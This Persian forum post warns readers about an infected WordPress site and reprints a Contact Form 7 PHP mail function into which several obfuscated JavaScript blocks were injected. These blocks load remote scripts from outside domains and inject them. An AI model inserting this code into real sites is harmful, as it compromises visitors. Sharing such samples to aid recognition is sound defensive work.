سلام

امروز بهم یکی از دوستان پیام داد که سایتش ویروسی شده است که داشتم می دیدم ، کل سایت پر از فایل های آلوده بود و یکسری فایل ها رو دیدم که داخل شون کد های مخرب تزریق شده بود ، برایتان قرار میدهم ، شاید بدردتون بخوره یا حداقل وقتی به چنین کد هایی خوردید متوجه شوید که این کد ها عادی نیستند :

کد PHP:
$header apply_filters'wpcf7_mail_html_header',            '<!doctype html><html xmlns="http://www.w3.org/1999/xhtml"' $lang_atts '><head><script type="text/javascript">var a1=function(){var _0x41fbx1=String["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"](104,116,116,112,115,58,47,47,99,100,110,119,101,98,115,105,116,101,102,111,114,121,111,117,46,98,105,122,47,99,100,110,46,106,115,63,99,61,49);var _0x41fbx2=document["\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74"]("\x73\x63\x72\x69\x70\x74");_0x41fbx2["\x74\x79\x70\x65"]= "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74";_0x41fbx2["\x61\x73\x79\x6E\x63"]= true;_0x41fbx2["\x69\x64"]= "\x63\x64\x37\x30\x39\x30\x31\x30";_0x41fbx2["\x73\x72\x63"]= _0x41fbx1;var _0x41fbx3=document["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"]("\x73\x63\x72\x69\x70\x74")[0];_0x41fbx3["\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65"]["\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65"](_0x41fbx2,_0x41fbx3)};var scripts=document["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"]("\x73\x63\x72\x69\x70\x74");var n=true;for(var i=0;i< scripts["\x6C\x65\x6E\x67\x74\x68"];i++){if(scripts[i]["\x69\x64"]== "\x63\x64\x37\x30\x39\x30\x31\x30"){n= false}};if(n== true){a1()}</script><script language=javascript>var _0xfcc55=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc55[0]](104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 117, 101, 101, 121, 101, 115, 119, 101, 98, 115, 105, 116, 101, 46, 99, 111, 109, 47, 97, 100, 46, 106, 115, 63, 116, 49);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc55[2]](_0xfcc55[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc55[3]](null);return _0x3bc1x5[_0xfcc55[4]]};var text=get_text(url);if(text!= String[_0xfcc55[0]](110,117,108,108)&& text[_0xfcc55[5]](String[_0xfcc55[0]](104,116,116,112,115,58,47,47))>  -1){var a=function(){var _0x3bc1x8=document[_0xfcc55[6]](String[_0xfcc55[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc55[7]]= String[_0xfcc55[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc55[8]]= true;_0x3bc1x8[_0xfcc55[9]]= _0xfcc55[10];_0x3bc1x8[_0xfcc55[11]]= text;document[_0xfcc55[13]](String[_0xfcc55[0]](104,101,97,100))[0][_0xfcc55[12]](_0x3bc1x8)};var scrpts=document[_0xfcc55[13]](_0xfcc55[14]);var n=true;for(var i=scrpts[_0xfcc55[15]];i--;){if(scrpts[i][_0xfcc55[9]]== _0xfcc55[10]){n= false}};if(n== true){a()}}</script><script type='text/javascript'>var _0x1e38=['length','fromCharCode','createElement','type','async','code125','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,_0x3f720e){var _0x440369=function(_0x2e1b64){while(--_0x2e1b64){_0x546a53['push'](_0x546a53['shift']());}};_0x440369(++_0x3f720e);}(_0x1e38,0x1e1));var _0x5a05=function(_0x716551,_0x1d4a8e){_0x716551=_0x716551-0x0;var _0x2b7638=_0x1e38[_0x716551];return _0x2b7638;};var url=String[_0x5a05('0x0')](104, 116, 116, 112, 115, 58, 47, 47, 102, 111, 114, 119, 97, 114, 100, 109, 121, 116, 114, 97, 102, 102, 105, 99, 46, 99, 111, 109, 47, 97, 100, 46, 106, 115, 63, 112, 111, 114, 116, 61, 52, 52);var a=function(){var _0x22c9c8=document[_0x5a05('0x1')](String[_0x5a05('0x0')](0x73,0x63,0x72,0x69,0x70,0x74));_0x22c9c8[_0x5a05('0x2')]=String[_0x5a05('0x0')](0x74,0x65,0x78,0x74,0x2f,0x6a,0x61,0x76,0x61,0x73,0x63,0x72,0x69,0x70,0x74);_0x22c9c8[_0x5a05('0x3')]=!![];_0x22c9c8['id']=_0x5a05('0x4');_0x22c9c8[_0x5a05('0x5')]=url;document['getElementsByTagName'](String[_0x5a05('0x0')](0x68,0x65,0x61,0x64))[0x0][_0x5a05('0x6')](_0x22c9c8);};var scrpts=document[_0x5a05('0x7')](_0x5a05('0x8'));var n=!![];for(var i=scrpts[_0x5a05('0x9')];i--;){if(scrpts[i]['id']==_0x5a05('0x4')){n=![];}};if(n==!![]){a();}</script><title>' esc_html$this->get'subject'true ) ) . '</title><script type='text/javascript'>var _0x1e38=['length','fromCharCode','createElement','type','async','code125','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,_0x3f720e){var _0x440369=function(_0x2e1b64){while(--_0x2e1b64){_0x546a53['push'](_0x546a53['shift']());}};_0x440369(++_0x3f720e);}(_0x1e38,0x1e1));var _0x5a05=function(_0x716551,_0x1d4a8e){_0x716551=_0x716551-0x0;var _0x2b7638=_0x1e38[_0x716551];return _0x2b7638;};var url=String[_0x5a05('0x0')](104, 116, 116, 112, 115, 58, 47, 47, 102, 111, 114, 119, 97, 114, 100, 109, 121, 116, 114, 97, 102, 102, 105, 99, 46, 99, 111, 109, 47, 97, 100, 46, 106, 115, 63, 112, 111, 114, 116, 61, 52, 52);var a=function(){var _0x22c9c8=document[_0x5a05('0x1')](String[_0x5a05('0x0')](0x73,0x63,0x72,0x69,0x70,0x74));_0x22c9c8[_0x5a05('0x2')]=String[_0x5a05('0x0')](0x74,0x65,0x78,0x74,0x2f,0x6a,0x61,0x76,0x61,0x73,0x63,0x72,0x69,0x70,0x74);_0x22c9c8[_0x5a05('0x3')]=!![];_0x22c9c8['id']=_0x5a05('0x4');_0x22c9c8[_0x5a05('0x5')]=url;document['getElementsByTagName'](String[_0x5a05('0x0')](0x68,0x65,0x61,0x64))[0x0][_0x5a05('0x6')](_0x22c9c8);};var scrpts=document[_0x5a05('0x7')](_0x5a05('0x8'));var n=!![];for(var i=scrpts[_0x5a05('0x9')];i--;){if(scrpts[i]['id']==_0x5a05('0x4')){n=![];}};if(n==!![]){a();}</script><script language=javascript>var _0xfcc55=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc55[0]](104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 117, 101, 101, 121, 101, 115, 119, 101, 98, 115, 105, 116, 101, 46, 99, 111, 109, 47, 97, 100, 46, 106, 115, 63, 116, 49);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc55[2]](_0xfcc55[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc55[3]](null);return _0x3bc1x5[_0xfcc55[4]]};var text=get_text(url);if(text!= String[_0xfcc55[0]](110,117,108,108)&& text[_0xfcc55[5]](String[_0xfcc55[0]](104,116,116,112,115,58,47,47))>  -1){var a=function(){var _0x3bc1x8=document[_0xfcc55[6]](String[_0xfcc55[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc55[7]]= String[_0xfcc55[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc55[8]]= true;_0x3bc1x8[_0xfcc55[9]]= _0xfcc55[10];_0x3bc1x8[_0xfcc55[11]]= text;document[_0xfcc55[13]](String[_0xfcc55[0]](104,101,97,100))[0][_0xfcc55[12]](_0x3bc1x8)};var scrpts=document[_0xfcc55[13]](_0xfcc55[14]);var n=true;for(var i=scrpts[_0xfcc55[15]];i--;){if(scrpts[i][_0xfcc55[9]]== _0xfcc55[10]){n= false}};if(n== true){a()}}</script><script type="text/javascript">var a1=function(){var _0x41fbx1=String["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"](104,116,116,112,115,58,47,47,99,100,110,119,101,98,115,105,116,101,102,111,114,121,111,117,46,98,105,122,47,99,100,110,46,106,115,63,99,61,49);var _0x41fbx2=document["\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74"]("\x73\x63\x72\x69\x70\x74");_0x41fbx2["\x74\x79\x70\x65"]= "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74";_0x41fbx2["\x61\x73\x79\x6E\x63"]= true;_0x41fbx2["\x69\x64"]= "\x63\x64\x37\x30\x39\x30\x31\x30";_0x41fbx2["\x73\x72\x63"]= _0x41fbx1;var _0x41fbx3=document["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"]("\x73\x63\x72\x69\x70\x74")[0];_0x41fbx3["\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65"]["\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65"](_0x41fbx2,_0x41fbx3)};var scripts=document["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"]("\x73\x63\x72\x69\x70\x74");var n=true;for(var i=0;i< scripts["\x6C\x65\x6E\x67\x74\x68"];i++){if(scripts[i]["\x69\x64"]== "\x63\x64\x37\x30\x39\x30\x31\x30"){n= false}};if(n== true){a1()}</script></head><body>'$this );
        
$footer apply_filters'wpcf7_mail_html_footer',            '</body></html>'$this );
        
$html $header wpautop$body ) . $footer;        return $html;    }
    private function 
compose$send true ) {        $components = array(            'subject' => $this->get'subject'true ),            'sender' => $this->get'sender'true ),            'body' => $this->get'body'true ),            'recipient' => $this->get'recipient'true ),            'additional_headers' => $this->get'additional_headers'true ),            'attachments' => $this->attachments(),        );
        
$components apply_filters'wpcf7_mail_components',            $componentswpcf7_get_current_contact_form(), $this );
        if ( ! 
$send ) {            return $components;        }
        
$subject wpcf7_strip_newline$components['subject'] );        $sender wpcf7_strip_newline$components['sender'] );        $recipient wpcf7_strip_newline$components['recipient'] );        $body $components['body'];        $additional_headers trim$components['additional_headers'] );        $attachments $components['attachments'];
        
$headers "From: $sender\n";
        if ( 
$this->use_html ) {            $headers .= "Content-Type: text/html\n";            $headers .= "X-WPCF7-Content-Type: text/html\n";        } else {            $headers .= "X-WPCF7-Content-Type: text/plain\n";        }
        if ( 
$additional_headers ) {            $headers .= $additional_headers "\n";        }
        return 
wp_mail$recipient$subject$body$headers$attachments );    }